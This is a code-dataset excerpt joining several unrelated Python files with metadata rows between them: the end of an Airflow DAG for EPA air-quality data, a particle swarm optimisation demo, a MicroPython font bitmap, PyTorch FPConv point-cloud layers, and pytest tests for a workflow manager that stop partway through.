"OUTPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "date_local",\n "time_local", "date_gmt", "time_gmt", "sample_measurement", "units_of_measure",\n "mdl", "uncertainty", "qualifier", "method_type", "method_code", "method_name",\n "state_name", "county_name", "date_of_last_change" ]',
},
resources={"request_ephemeral_storage": "16G", "request_cpu": "1"},
)
delete_cluster = kubernetes_engine.GKEDeleteClusterOperator(
task_id="delete_cluster",
project_id="{{ var.value.gcp_project }}",
location="us-central1-c",
name="epa-hist-air-quality",
)
(
create_cluster
>> [
annual_summaries,
co_daily_summary,
co_hourly_summary,
hap_daily_summary,
hap_hourly_summary,
lead_daily_summary,
no2_daily_summary,
no2_hourly_summary,
nonoxnoy_daily_summary,
nonoxnoy_hourly_summary,
ozone_daily_summary,
ozone_hourly_summary,
pm10_daily_summary,
pm10_hourly_summary,
pm25_frm_hourly_summary,
pm25_nonfrm_daily_summary,
pm25_nonfrm_hourly_summary,
pm25_speciation_daily_summary,
pm25_speciation_hourly_summary,
pressure_daily_summary,
pressure_hourly_summary,
rh_and_dp_daily_summary,
rh_and_dp_hourly_summary,
so2_daily_summary,
so2_hourly_summary,
temperature_daily_summary,
temperature_hourly_summary,
voc_daily_summary,
voc_hourly_summary,
wind_daily_summary,
wind_hourly_summary,
]
>> delete_cluster
)
| 96.046918
| 1,716
| 0.664205
| 12,720
| 104,403
| 5.028223
| 0.022327
| 0.044247
| 0.06254
| 0.089901
| 0.963993
| 0.959036
| 0.956175
| 0.934489
| 0.927454
| 0.923404
| 0
| 0.014185
| 0.159344
| 104,403
| 1,086
| 1,717
| 96.135359
| 0.714551
| 0.017126
| 0
| 0.610945
| 0
| 0.092537
| 0.775646
| 0.259813
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.00199
| 0
| 0.00199
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
774d0fef679794770ac8588e28df5cb8cc9749c4
| 3,980
|
py
|
Python
|
basic/fxy.py
|
rkneusel9/SwarmOptimization
|
5445b6f90ab49339ca0fdb71e98d44e6827c95a8
|
[
"MIT"
] | 2
|
2022-01-11T17:14:14.000Z
|
2022-03-07T10:22:32.000Z
|
basic/fxy.py
|
rkneusel9/SwarmOptimization
|
5445b6f90ab49339ca0fdb71e98d44e6827c95a8
|
[
"MIT"
] | null | null | null |
basic/fxy.py
|
rkneusel9/SwarmOptimization
|
5445b6f90ab49339ca0fdb71e98d44e6827c95a8
|
[
"MIT"
] | 1
|
2021-11-24T01:11:49.000Z
|
2021-11-24T01:11:49.000Z
|
#
# file: fxy.py
#
# The basic example from Chapter 2.
#
# RTK, 03-Mar-2020
# Last update: 03-Mar-2020
#
################################################################
import sys
sys.path.append("../")
import numpy as np
from PSO import *
from DE import *
from LinearInertia import *
from Bounds import *
from RandomInitializer import *
class Objective:
def Evaluate(self, pos):
return pos[0]*pos[1]
# PSO with clipping
npart = 10
ndim = 2
m = 100
tol = 1e-4
b = Bounds([0.01,0.01], [1,1])
i = RandomInitializer(npart, ndim, bounds=b)
swarm = PSO(obj=Objective(), npart=npart, ndim=ndim, init=i, tol=tol, max_iter=m, bounds=b, inertia=LinearInertia())
swarm.Optimize()
res = swarm.Results()
x,y = res["gpos"][-1]
g = res["gbest"][-1]
print()
print("PSO: npart, m = %d, %d (clip)" % (npart, m))
print(" f(%0.8f, %0.8f) = %0.8f" % (x,y,g))
print(" (%d swarm best updates, %d iterations)" % (len(res["gbest"]), res["iterations"]))
print()
print("Swarm bests:")
for i in range(len(res["gbest"])):
print(" f(%0.8f, %0.8f) = %0.8f" % (res["gpos"][i][0], res["gpos"][i][1], res["gbest"][i]))
print()
print()
# PSO with resampling
m = 100
npart = 10
b = Bounds([0.01,0.01], [1,1], enforce="resample")
i = RandomInitializer(npart, ndim, bounds=b)
swarm = PSO(obj=Objective(), npart=npart, ndim=ndim, init=i, tol=tol, max_iter=m, bounds=b, inertia=LinearInertia())
swarm.Optimize()
res = swarm.Results()
x,y = res["gpos"][-1]
g = res["gbest"][-1]
print()
print("PSO: npart, m = %d, %d (resample)" % (npart, m))
print(" f(%0.8f, %0.8f) = %0.8f" % (x,y,g))
print(" (%d swarm best updates, %d iterations)" % (len(res["gbest"]), res["iterations"]))
print()
print("Swarm bests:")
for i in range(len(res["gbest"])):
print(" f(%0.8f, %0.8f) = %0.8f" % (res["gpos"][i][0], res["gpos"][i][1], res["gbest"][i]))
print()
print()
m = 1000
npart = 10
b = Bounds([0.01,0.01], [1,1], enforce="resample")
i = RandomInitializer(npart, ndim, bounds=b)
swarm = PSO(obj=Objective(), npart=npart, ndim=ndim, init=i, tol=tol, max_iter=m, bounds=b, inertia=LinearInertia())
swarm.Optimize()
res = swarm.Results()
x,y = res["gpos"][-1]
g = res["gbest"][-1]
print()
print("PSO: npart, m = %d, %d (resample)" % (npart, m))
print(" f(%0.8f, %0.8f) = %0.8f" % (x,y,g))
print(" (%d swarm best updates, %d iterations)" % (len(res["gbest"]), res["iterations"]))
print()
print("Swarm bests:")
for i in range(len(res["gbest"])):
print(" f(%0.8f, %0.8f) = %0.8f" % (res["gpos"][i][0], res["gpos"][i][1], res["gbest"][i]))
print()
print()
m = 100
npart = 100
b = Bounds([0.01,0.01], [1,1], enforce="resample")
i = RandomInitializer(npart, ndim, bounds=b)
swarm = PSO(obj=Objective(), npart=npart, ndim=ndim, init=i, tol=tol, max_iter=m, bounds=b, inertia=LinearInertia())
swarm.Optimize()
res = swarm.Results()
x,y = res["gpos"][-1]
g = res["gbest"][-1]
print()
print("PSO: npart, m = %d, %d (resample)" % (npart, m))
print(" f(%0.8f, %0.8f) = %0.8f" % (x,y,g))
print(" (%d swarm best updates, %d iterations)" % (len(res["gbest"]), res["iterations"]))
print()
print("Swarm bests:")
for i in range(len(res["gbest"])):
print(" f(%0.8f, %0.8f) = %0.8f" % (res["gpos"][i][0], res["gpos"][i][1], res["gbest"][i]))
print()
print()
# differential evolution & resampling
m = 100
npart = 10
b = Bounds([0.01,0.01], [1,1], enforce="resample")
i = RandomInitializer(npart, ndim, bounds=b)
swarm = DE(obj=Objective(), npart=npart, ndim=ndim, init=i, tol=tol, max_iter=m, bounds=b)
swarm.Optimize()
res = swarm.Results()
x,y = res["gpos"][-1]
g = res["gbest"][-1]
print()
print("DE: npart, m = %d, %d (resample)" % (npart, m))
print(" f(%0.8f, %0.8f) = %0.8f" % (x,y,g))
print(" (%d swarm best updates, %d iterations)" % (len(res["gbest"]), res["iterations"]))
print()
print("Swarm bests:")
for i in range(len(res["gbest"])):
print(" f(%0.8f, %0.8f) = %0.8f" % (res["gpos"][i][0], res["gpos"][i][1], res["gbest"][i]))
print()
| 27.448276
| 116
| 0.585678
| 652
| 3,980
| 3.567485
| 0.125767
| 0.038693
| 0.034394
| 0.051591
| 0.858555
| 0.858555
| 0.858555
| 0.858555
| 0.852107
| 0.852107
| 0
| 0.048701
| 0.148744
| 3,980
| 144
| 117
| 27.638889
| 0.637839
| 0.042211
| 0
| 0.82243
| 0
| 0
| 0.253348
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.009346
| false
| 0
| 0.065421
| 0.009346
| 0.093458
| 0.411215
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
91f9447ee2712cec94f6134d7f3a7ad812e091da
| 6,367
|
py
|
Python
|
port/modules/font/digiface_it_30.py
|
diskman88/mpython-desktop-robot
|
01cd15fbeeba521ab874cf66f94d3909c4f8c39a
|
[
"MIT"
] | 53
|
2018-10-15T12:01:24.000Z
|
2019-11-22T09:31:02.000Z
|
port/modules/font/digiface_it_30.py
|
diskman88/mpython-desktop-robot
|
01cd15fbeeba521ab874cf66f94d3909c4f8c39a
|
[
"MIT"
] | 10
|
2018-10-17T13:42:19.000Z
|
2019-11-25T06:42:40.000Z
|
port/modules/font/digiface_it_30.py
|
diskman88/mpython-desktop-robot
|
01cd15fbeeba521ab874cf66f94d3909c4f8c39a
|
[
"MIT"
] | 26
|
2018-12-04T03:53:39.000Z
|
2019-11-22T03:40:05.000Z
|
# Code generated by font-to-py.py.
# Font: digi_italic.ttf Char set: .0123456789:
version = '0.26'
def height():
return 30
def max_width():
return 23
def hmap():
return True
def reverse():
return False
def monospaced():
return False
def min_ch():
return 32
def max_ch():
return 63
_font =\
b'\x12\x00\x0f\xf8\x00\x1f\xfc\x00\x3f\xfc\x00\x1f\xfb\x00\x00\x07'\
b'\x00\x00\x07\x00\x00\x07\x00\x00\x07\x00\x00\x0e\x00\x00\x0e\x00'\
b'\x00\x0e\x00\x00\x0e\x00\x0f\xee\x00\x17\xf4\x00\x13\xf8\x00\x1b'\
b'\xc0\x00\x38\x00\x00\x38\x00\x00\x38\x00\x00\x38\x00\x00\x38\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x70\x00\x00\x70\x00\x00\x70\x00\x00'\
b'\xe0\x00\x00\xe0\x00\x00\xe0\x00\x00\xe0\x00\x00\x0c\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x70\x70\x70\xf0\xe0\xe0\x15\x00\x00\x7f\xe0\x00'\
b'\xff\xe0\x02\xff\xf0\x06\xff\xf8\x0e\x00\x38\x0e\x00\x78\x0e\x00'\
b'\x78\x0e\x00\x70\x1c\x00\x70\x1c\x00\x70\x1c\x00\x70\x1c\x00\xe0'\
b'\x18\x00\xe0\x30\x00\x20\x00\x00\x00\x00\x00\x20\x30\x00\xc0\x78'\
b'\x01\xc0\x70\x01\xc0\x70\x01\xc0\x70\x03\xc0\x70\x03\x80\xe0\x03'\
b'\x80\xe0\x03\x80\xe0\x03\x80\xe0\x07\x00\xdf\xfb\x00\x3f\xfe\x00'\
b'\x3f\xf8\x00\x1f\xf0\x00\x15\x00\x01\x00\x00\x01\x00\x00\x03\x00'\
b'\x00\x07\x00\x00\x07\x00\x00\x0e\x00\x00\x0e\x00\x00\x0e\x00\x00'\
b'\x0e\x00\x00\x1e\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x0c'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x38\x00\x00\x78\x00'\
b'\x00\x70\x00\x00\x70\x00\x00\x70\x00\x00\x70\x00\x00\xe0\x00\x00'\
b'\xe0\x00\x00\xe0\x00\x00\xe0\x00\x00\x60\x00\x00\x40\x00\x00\x00'\
b'\x00\x00\x16\x00\x00\x7f\xe0\x00\xff\xe0\x03\xff\xe8\x07\xff\xd8'\
b'\x00\x00\x38\x00\x00\x38\x00\x00\x38\x00\x00\x38\x00\x00\x38\x00'\
b'\x00\x70\x00\x00\x70\x00\x00\x70\x03\xff\x70\x0f\xff\xf0\x1f\xff'\
b'\xc0\x07\xff\x00\x70\x00\x00\x78\x00\x00\x70\x00\x00\x70\x00\x00'\
b'\x70\x00\x00\xf0\x00\x00\xe0\x00\x00\xe0\x00\x00\xe0\x00\x00\xe0'\
b'\x00\x00\xdf\xfc\x00\xbf\xfc\x00\x3f\xfe\x00\x1f\xff\x00\x16\x00'\
b'\x01\xff\xe0\x01\xff\xf0\x00\xff\xf8\x00\x7f\xf8\x00\x00\x38\x00'\
b'\x00\x38\x00\x00\x38\x00\x00\x38\x00\x00\x78\x00\x00\x70\x00\x00'\
b'\x70\x00\x00\x70\x03\xff\xf0\x07\xff\xf0\x0f\xff\xc0\x03\xff\x00'\
b'\x00\x00\x60\x00\x00\xe0\x00\x01\xc0\x00\x01\xc0\x00\x01\xc0\x00'\
b'\x01\xc0\x00\x03\xc0\x00\x03\x80\x00\x03\x80\x00\x03\x80\x0f\xfb'\
b'\x00\x1f\xfe\x00\x3f\xfc\x00\x7f\xf8\x00\x15\x00\x10\x00\x10\x10'\
b'\x00\x10\x18\x00\x30\x3c\x00\x70\x38\x00\xe0\x38\x00\xe0\x38\x00'\
b'\xe0\x38\x00\xe0\x70\x01\xe0\x70\x01\xc0\x70\x01\xc0\x70\x01\xc0'\
b'\x63\xff\xc0\xcf\xff\xc0\x3f\xff\xc0\x1f\xff\x00\x00\x01\x80\x00'\
b'\x07\x80\x00\x07\x00\x00\x07\x00\x00\x07\x00\x00\x07\x00\x00\x0f'\
b'\x00\x00\x0e\x00\x00\x0e\x00\x00\x0e\x00\x00\x0e\x00\x00\x0c\x00'\
b'\x00\x04\x00\x00\x00\x00\x17\x00\x00\x3f\xfc\x00\x7f\xf8\x01\x7f'\
b'\xf0\x03\x7f\xe0\x07\x00\x00\x07\x00\x00\x07\x00\x00\x07\x00\x00'\
b'\x0e\x00\x00\x0e\x00\x00\x0e\x00\x00\x0e\x00\x00\x0c\x7f\xe0\x19'\
b'\xff\xf8\x07\xff\xf8\x03\xff\xe0\x00\x00\x30\x00\x00\x70\x00\x00'\
b'\xe0\x00\x00\xe0\x00\x00\xe0\x00\x00\xe0\x00\x00\xe0\x00\x01\xc0'\
b'\x00\x01\xc0\x00\x01\xc0\x0f\xfd\x80\x3f\xff\x00\x7f\xfc\x00\xff'\
b'\xf8\x00\x16\x00\x00\x7f\xf8\x00\xff\xf0\x02\xff\xe0\x06\xff\xc0'\
b'\x0e\x00\x00\x0e\x00\x00\x0e\x00\x00\x0e\x00\x00\x1c\x00\x00\x1c'\
b'\x00\x00\x1c\x00\x00\x1c\x00\x00\x18\xff\xc0\x33\xff\xf0\x0f\xff'\
b'\xf0\x07\xff\xc0\x30\x00\x60\x78\x00\xe0\x70\x01\xc0\x70\x01\xc0'\
b'\x70\x01\xc0\x70\x01\xc0\xe0\x01\xc0\xe0\x03\x80\xe0\x03\x80\xe0'\
b'\x03\x80\xdf\xfb\x00\x3f\xfe\x00\x3f\xf8\x00\x1f\xf0\x00\x15\x00'\
b'\x7f\xfe\x00\x7f\xfc\x80\x3f\xf9\x00\x1f\xf3\x00\x00\x07\x00\x00'\
b'\x07\x00\x00\x07\x00\x00\x0e\x00\x00\x0e\x00\x00\x0e\x00\x00\x0e'\
b'\x00\x00\x1e\x00\x00\x1c\x00\x00\x04\x00\x00\x00\x00\x00\x04\x00'\
b'\x00\x08\x00\x00\x38\x00\x00\x38\x00\x00\x38\x00\x00\x78\x00\x00'\
b'\x70\x00\x00\x70\x00\x00\x70\x00\x00\x70\x00\x00\xe0\x00\x00\xe0'\
b'\x00\x00\x60\x00\x00\x20\x00\x00\x00\x00\x15\x00\x00\x7f\xe0\x00'\
b'\xff\xe0\x02\xff\xf0\x06\xff\xf8\x0e\x00\x38\x0e\x00\x38\x0e\x00'\
b'\x78\x0e\x00\x70\x1c\x00\x70\x1c\x00\x70\x1c\x00\x70\x1c\x00\xe0'\
b'\x18\xff\xe0\x33\xff\xf0\x0f\xff\xf0\x07\xff\xe0\x30\x00\xc0\x78'\
b'\x01\xc0\x70\x01\xc0\x70\x01\xc0\x70\x03\xc0\x70\x03\x80\xe0\x03'\
b'\x80\xe0\x03\x80\xe0\x03\x80\xe0\x07\x00\xdf\xfb\x00\x3f\xfe\x00'\
b'\x3f\xf8\x00\x1f\xf0\x00\x16\x00\x00\x7f\xe0\x00\xff\xe0\x02\xff'\
b'\xf0\x06\xff\xf8\x0e\x00\x38\x0e\x00\x38\x0e\x00\x78\x0e\x00\x70'\
b'\x1c\x00\x70\x1c\x00\x70\x1c\x00\x70\x1c\x00\xe0\x1c\x7f\xe0\x31'\
b'\xff\xf8\x0f\xff\xf8\x03\xff\xe0\x00\x00\x40\x00\x01\xc0\x00\x01'\
b'\xc0\x00\x01\xc0\x00\x03\xc0\x00\x03\x80\x00\x03\x80\x00\x03\x80'\
b'\x00\x03\x80\x00\x07\x00\x1f\xfb\x00\x3f\xfe\x00\x7f\xf8\x00\xff'\
b'\xf0\x00\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0e\x0e'\
b'\x0e\x0e\x1c\x1c\x00\x00\x00\x00\x00\x00\x00\x78\x70\x70\x70\x70'\
b'\xf0\xe0'
_index =\
b'\x00\x00\x5c\x00\x5c\x00\x9a\x00\x00\x00\x5c\x00\x00\x00\x5c\x00'\
b'\x00\x00\x5c\x00\x00\x00\x5c\x00\x00\x00\x5c\x00\x00\x00\x5c\x00'\
b'\x00\x00\x5c\x00\x00\x00\x5c\x00\x00\x00\x5c\x00\x00\x00\x5c\x00'\
b'\x00\x00\x5c\x00\x00\x00\x5c\x00\x00\x00\x5c\x00\x9a\x00\xba\x00'\
b'\x00\x00\x5c\x00\xba\x00\x16\x01\x16\x01\x72\x01\x72\x01\xce\x01'\
b'\xce\x01\x2a\x02\x2a\x02\x86\x02\x86\x02\xe2\x02\xe2\x02\x3e\x03'\
b'\x3e\x03\x9a\x03\x9a\x03\xf6\x03\xf6\x03\x52\x04\x52\x04\x72\x04'\
b'\x00\x00\x5c\x00\x00\x00\x5c\x00\x00\x00\x5c\x00\x00\x00\x5c\x00'\
b'\x00\x00\x5c\x00'
_mvfont = memoryview(_font)
def get_ch(ch):
ordch = ord(ch)
ordch = ordch + 1 if ordch >= 32 and ordch <= 63 else 63
idx_offs = 4 * (ordch - 32)
offset = int.from_bytes(_index[idx_offs : idx_offs + 2], 'little')
next_offs = int.from_bytes(_index[idx_offs + 2 : idx_offs + 4], 'little')
width = int.from_bytes(_font[offset:offset + 2], 'little')
return _mvfont[offset + 2:next_offs], 30, width
| 52.188525
| 78
| 0.687608
| 1,468
| 6,367
| 2.966621
| 0.081063
| 0.39403
| 0.245924
| 0.245235
| 0.690471
| 0.650976
| 0.572445
| 0.534558
| 0.49667
| 0.46039
| 0
| 0.353314
| 0.059369
| 6,367
| 121
| 79
| 52.619835
| 0.373852
| 0.012251
| 0
| 0.140187
| 1
| 0.738318
| 0.827575
| 0.820114
| 0
| 1
| 0
| 0
| 0
| 1
| 0.074766
| false
| 0
| 0
| 0.065421
| 0.149533
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
62298a7ef72f43769dc524f9fdf4cdabea2013ad
| 8,087
|
py
|
Python
|
fpconv/fpconv.py
|
lyqun/FPConv
|
9fc3a71258550101bec671330c5e97b45725291c
|
[
"MIT"
] | 129
|
2020-03-13T11:47:18.000Z
|
2022-03-01T16:33:47.000Z
|
fpconv/fpconv.py
|
lyqun/FPConv
|
9fc3a71258550101bec671330c5e97b45725291c
|
[
"MIT"
] | 20
|
2020-03-13T12:41:06.000Z
|
2021-10-06T11:29:05.000Z
|
fpconv/fpconv.py
|
lyqun/FPConv
|
9fc3a71258550101bec671330c5e97b45725291c
|
[
"MIT"
] | 18
|
2020-03-14T13:19:41.000Z
|
2022-02-25T04:50:30.000Z
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.nn.parameter import Parameter
from fpconv.pointnet2 import pointnet2_utils
from fpconv.pointnet2 import pytorch_utils as pt_utils
from fpconv import base
relu_alpha = 0.2
class FPConv4x4_BaseBlock(nn.Module):
def __init__(self, npoint, nsample, radius, in_channel, out_channel, bn=True, use_xyz=False):
super().__init__()
print('fpconv4x4 init:', npoint, nsample, radius, in_channel, out_channel)
self.npoint = npoint
self.nsample = nsample
self.keep_pcd = npoint is None
self.use_xyz = use_xyz
self.grouper = pointnet2_utils.QueryAndGroupLocal(radius, nsample)
self.wts_layer = base.ProjWeightModule(mlp_pn=[8,16], mlp_wts=[16], map_size=4, bn=bn)
if use_xyz:
in_channel += 3
self.proj_conv = pt_utils.Conv2d(in_size=in_channel,
out_size=out_channel,
kernel_size=(16,1),
bn=bn,
activation=nn.LeakyReLU(negative_slope=relu_alpha, inplace=True))
def forward(self, xyz, features, new_xyz=None):
'''
:param xyz: B,N,3
:param features: B,C,N
:returns:
new_xyz: B,np,3
new_feats: B,C,np
'''
# sample new xyz
if not self.keep_pcd and new_xyz is None:
xyz_flipped = xyz.transpose(1, 2).contiguous() # B,3,npoint
idx = pointnet2_utils.furthest_point_sample(xyz, self.npoint) # B,npoint
new_xyz_flipped = pointnet2_utils.gather_operation(xyz_flipped, idx) # B,3,npoint
new_xyz = new_xyz_flipped.transpose(1, 2).contiguous() # B,npoint,3
elif new_xyz is not None:
self.npoint = new_xyz.size(1)
else: # keep pcd
new_xyz = xyz
self.npoint = new_xyz.size(1)
# get distribution vector
grouped_xyz, grouped_feats = self.grouper(xyz, new_xyz, features)
proj_wts = self.wts_layer(grouped_xyz) # B,ml+1,np,ns
if self.use_xyz:
grouped_feats = torch.cat([grouped_xyz, grouped_feats], dim=1)
# normalize weights
# normalize at dim 1 <ml>
proj_wts2_ = proj_wts ** 2 # B, ml, np, ns
proj_wts_sum = torch.sum(proj_wts2_, dim=1, keepdim=True) # B, 1, np, ns
proj_wts_sum = torch.max(proj_wts_sum, torch.tensor(1e-8).cuda())
proj_wts_sum = torch.sqrt(proj_wts_sum) # B, 1, np, ns
proj_wts = proj_wts / proj_wts_sum
# normalize at dim 3 <nsample>
proj_wts_sum = torch.sum(proj_wts2_, dim=3, keepdim=True) # B,ml,np,1
proj_wts_sum = torch.max(proj_wts_sum, torch.tensor(1e-8).cuda())
proj_wts_sum = torch.sqrt(proj_wts_sum) # B, 1, np, ns
proj_wts_sum = torch.max(proj_wts_sum, torch.tensor(1.0).cuda())
proj_wts = proj_wts / proj_wts_sum # B,ml,np,ns
# projection
proj_wts = proj_wts.transpose(1,2) # B, np, ml, ns
grouped_feats = grouped_feats.permute(0, 2, 3, 1) # B, C, np, bs => B, np, ns, C
multi = proj_wts.matmul(grouped_feats)
proj_feats = F.leaky_relu(proj_wts.matmul(grouped_feats), negative_slope=relu_alpha, inplace=True) # B, np, ml, C
proj_feats = proj_feats.transpose(1,3) # B, C, ml, np
# convolution
proj_feats = self.proj_conv(proj_feats) # B, C_new, 1, np
proj_feats = proj_feats.squeeze(2) # B, C_new, np
return new_xyz, proj_feats
class FPConv6x6_BaseBlock(nn.Module):
def __init__(self, npoint, nsample, radius, in_channel, out_channel, bn=True, use_xyz=False):
super().__init__()
print('fpconv6x6 init:', npoint, nsample, radius, in_channel, out_channel)
self.npoint = npoint
self.map_size = 6
self.map_len = self.map_size ** 2
self.nsample = nsample
self.keep_pcd = npoint is None
self.use_xyz = use_xyz
self.grouper = pointnet2_utils.QueryAndGroupLocal(radius, nsample)
self.wts_layer = base.ProjWeightModule(mlp_pn=[8,16,16], mlp_wts=[16,32], map_size=6, bn=bn)
if use_xyz:
in_channel += 3
self.bias = Parameter(torch.Tensor(in_channel))
mid_channel = in_channel
self.proj_conv = nn.Sequential(
pt_utils.Conv3d(in_size=in_channel,
out_size=mid_channel,
kernel_size=(3,3,1),
bn=bn,
activation=nn.LeakyReLU(negative_slope=relu_alpha, inplace=True)),
pt_utils.Conv3d(in_size=in_channel,
out_size=mid_channel,
kernel_size=(3,3,1),
bn=bn,
activation=nn.LeakyReLU(negative_slope=relu_alpha, inplace=True)),
pt_utils.Conv3d(in_size=mid_channel,
out_size=out_channel,
kernel_size=(2,2,1),
bn=bn,
activation=nn.LeakyReLU(negative_slope=relu_alpha, inplace=True)))
self.reset_parameters()
def reset_parameters(self):
nn.init.constant_(self.bias, -0.05)
def forward(self, xyz, features, new_xyz=None):
'''
:param xyz: B,N,3
:param features: B,C,N
:returns:
new_xyz: B,np,3
new_feats: B,C,np
'''
# sample new xyz
if not self.keep_pcd and new_xyz is None:
xyz_flipped = xyz.transpose(1, 2).contiguous() # B,3,npoint
idx = pointnet2_utils.furthest_point_sample(xyz, self.npoint) # B,npoint
new_xyz_flipped = pointnet2_utils.gather_operation(xyz_flipped, idx) # B,3,npoint
new_xyz = new_xyz_flipped.transpose(1, 2).contiguous() # B,npoint,3
elif new_xyz is not None:
idx = None
self.npoint = new_xyz.size(1)
else:
idx = None
new_xyz = xyz
self.npoint = new_xyz.size(1)
# get distribution vector
grouped_xyz, grouped_feats = self.grouper(xyz, new_xyz, features)
proj_wts = self.wts_layer(grouped_xyz) # B,ml,np,ns
if self.use_xyz:
grouped_feats = torch.cat([grouped_xyz, grouped_feats], dim=1)
# normalize weights
# normalize at dim 1 <ml>
proj_wts2_ = proj_wts ** 2 # B, ml, np, ns
proj_wts_sum = torch.sum(proj_wts2_, dim=1, keepdim=True) # B, 1, np, ns
proj_wts_sum = torch.max(proj_wts_sum, torch.tensor(1e-8).cuda())
proj_wts_sum = torch.sqrt(proj_wts_sum) # B, 1, np, ns
proj_wts = proj_wts / proj_wts_sum
# normalize at dim 3 <nsample>
# proj_wts2_ = proj_wts ** 2 # B, ml, np, ns
proj_wts_sum = torch.sum(proj_wts2_, dim=3, keepdim=True) # B,ml,np,1
proj_wts_sum = torch.max(proj_wts_sum, torch.tensor(1e-8).cuda())
proj_wts_sum = torch.sqrt(proj_wts_sum) # B, 1, np, ns
proj_wts_sum = torch.max(proj_wts_sum, torch.tensor(1.0).cuda())
proj_wts = proj_wts / proj_wts_sum # B,ml,np,ns
# projection
proj_wts = proj_wts.transpose(1,2) # B, np, ml, ns
grouped_feats = grouped_feats.permute(0, 2, 3, 1) # B, C, np, bs => B, np, ns, C
proj_feats = F.leaky_relu(proj_wts.matmul(grouped_feats) + self.bias, negative_slope=relu_alpha, inplace=True) # B, np, ml, C
# reshape projection features # B, np, ml, C => B, C, ms, ms, np
bs = proj_feats.size(0)
proj_feats = proj_feats.transpose(1, 3) # B, C, ml, np
proj_feats = proj_feats.view(bs, -1, self.map_size, self.map_size, self.npoint).contiguous() # B, C, ms, ms, np
# convolution
proj_feats = self.proj_conv(proj_feats) # B, C_new, 1, 1, np
proj_feats = proj_feats.squeeze(3).squeeze(2) # B, C_new, np
return new_xyz, proj_feats
| 42.78836
| 133
| 0.589217
| 1,154
| 8,087
| 3.880416
| 0.114385
| 0.075034
| 0.062528
| 0.066994
| 0.862662
| 0.849933
| 0.848146
| 0.822242
| 0.810183
| 0.798571
| 0
| 0.025718
| 0.302832
| 8,087
| 189
| 134
| 42.78836
| 0.768535
| 0.12823
| 0
| 0.728682
| 0
| 0
| 0.004356
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.03876
| false
| 0
| 0.054264
| 0
| 0.124031
| 0.015504
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
624f5611f7f45b4c021f89f1f9039ee30510708f
| 12,646
|
py
|
Python
|
tests/test_workflow.py
|
dimtruck/workflow-manager-py
|
423befca05ccaf9fecef3ca680c4f21f1fd96d45
|
[
"MIT"
] | 2
|
2021-09-14T17:06:46.000Z
|
2021-12-30T07:41:40.000Z
|
tests/test_workflow.py
|
dimtruck/workflow-manager-py
|
423befca05ccaf9fecef3ca680c4f21f1fd96d45
|
[
"MIT"
] | 1
|
2018-02-08T12:36:25.000Z
|
2018-02-08T12:36:25.000Z
|
tests/test_workflow.py
|
dimtruck/workflow-manager-py
|
423befca05ccaf9fecef3ca680c4f21f1fd96d45
|
[
"MIT"
] | 6
|
2017-09-05T19:39:53.000Z
|
2021-12-03T15:54:24.000Z
|
import example_task
from workflow_manager.manager import Manager
from workflow_manager.task import Task
def test_init():
assert Manager().show_flow() is None
def test_init_with_task():
task_one = example_task.SuccessTask('task 1')
assert Manager(task_one).show_flow().to_dict() == task_one.to_dict()
def test_register_task():
manager = Manager()
task = example_task.SuccessTask('task 1')
manager.register_initial_task(task)
assert Manager(task).show_flow().to_dict() == task.to_dict()
def test_workflow_with_two_items():
task_one = example_task.SuccessTask('task 1')
task_two = example_task.SuccessTask('task 2')
task_one.on_success(task_two)
manager = Manager()
manager.register_initial_task(task_one)
assert manager.show_flow().to_dict() == {
'name': 'task 1',
'success_flow': [
{
'name': 'task 2',
'success_flow': [],
'failure_flow': []
}
],
'failure_flow': []
}
def test_workflow_with_three_items_success_failure():
task_one = example_task.SuccessTask('task 1')
task_two = example_task.SuccessTask('task 2')
task_three = example_task.FailureTask('task 3')
task_one.on_success(task_two)
task_one.on_failure(task_three)
task_two.on_failure(task_three)
manager = Manager()
manager.register_initial_task(task_one)
assert manager.show_flow().to_dict() == {
'name': 'task 1',
'success_flow': [
{
'failure_flow': [
{
'failure_flow': [],
'name': 'task 3',
'success_flow': []
}
],
'name': 'task 2',
'success_flow': []
}
],
'failure_flow': [
{
'failure_flow': [],
'name': 'task 3',
'success_flow': []
}
]
}
